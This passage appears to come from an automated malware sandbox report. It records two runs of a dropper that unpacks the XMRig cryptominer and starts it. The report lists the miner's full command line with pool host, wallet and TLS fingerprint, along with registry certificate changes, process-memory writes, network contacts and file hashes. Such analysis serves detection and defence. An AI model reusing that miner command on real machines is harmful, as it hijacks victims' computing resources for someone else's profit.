memory/2572-57-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-58-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-59-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-60-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-61-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-62-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-63-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-64-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-65-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-66-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-67-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-68-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-69-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-70-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-71-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-72-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-73-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-74-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-75-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-76-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-77-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-78-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-79-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-80-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-81-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-82-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-83-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-84-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 16:00
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1807s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2916 wrote to memory of 3224 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2916 wrote to memory of 3224 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| NL | 23.62.61.75:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 75.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.253.116.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3224-16-0x0000027FEAFE0000-0x0000027FEB000000-memory.dmp
memory/3224-17-0x0000027FECA20000-0x0000027FECA40000-memory.dmp
memory/3224-18-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-20-0x0000027FECA60000-0x0000027FECA80000-memory.dmp
memory/3224-21-0x0000027FECA40000-0x0000027FECA60000-memory.dmp
memory/3224-19-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-22-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-23-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-24-0x0000027FECA60000-0x0000027FECA80000-memory.dmp
memory/3224-25-0x0000027FECA40000-0x0000027FECA60000-memory.dmp
memory/3224-26-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-27-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-28-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-29-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-30-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-31-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-32-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-33-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-34-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-35-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-36-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-37-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-38-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-39-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-40-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-41-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-42-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-43-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-44-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-45-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-46-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-47-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-48-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-49-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-50-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-51-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-52-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-53-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-54-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-55-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-56-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-57-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-58-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-59-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-60-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-61-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-62-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-63-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-64-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-65-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-66-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-67-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-68-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-69-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-70-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-71-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-72-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-73-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-74-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-75-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-76-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-77-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-78-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-79-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-80-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-81-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-82-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-83-0x00007FF724500000-0x00007FF725003000-memory.dmp
memory/3224-84-0x00007FF724500000-0x00007FF725003000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 16:00
Platform
win10v2004-20240426-en
Max time kernel
1792s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3036 wrote to memory of 2292 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3036 wrote to memory of 2292 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2292-16-0x000001B3E3260000-0x000001B3E3280000-memory.dmp
memory/2292-17-0x000001B3E32B0000-0x000001B3E32D0000-memory.dmp
memory/2292-18-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-20-0x000001B3E32F0000-0x000001B3E3310000-memory.dmp
memory/2292-19-0x000001B3E32D0000-0x000001B3E32F0000-memory.dmp
memory/2292-21-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-22-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-25-0x000001B3E32F0000-0x000001B3E3310000-memory.dmp
memory/2292-24-0x000001B3E32D0000-0x000001B3E32F0000-memory.dmp
memory/2292-23-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-26-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-27-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-28-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-29-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-30-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-31-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-32-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-33-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-34-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-35-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-36-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-37-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-38-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-39-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-40-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-41-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-42-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-43-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-44-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-45-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-46-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-47-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-48-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-49-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
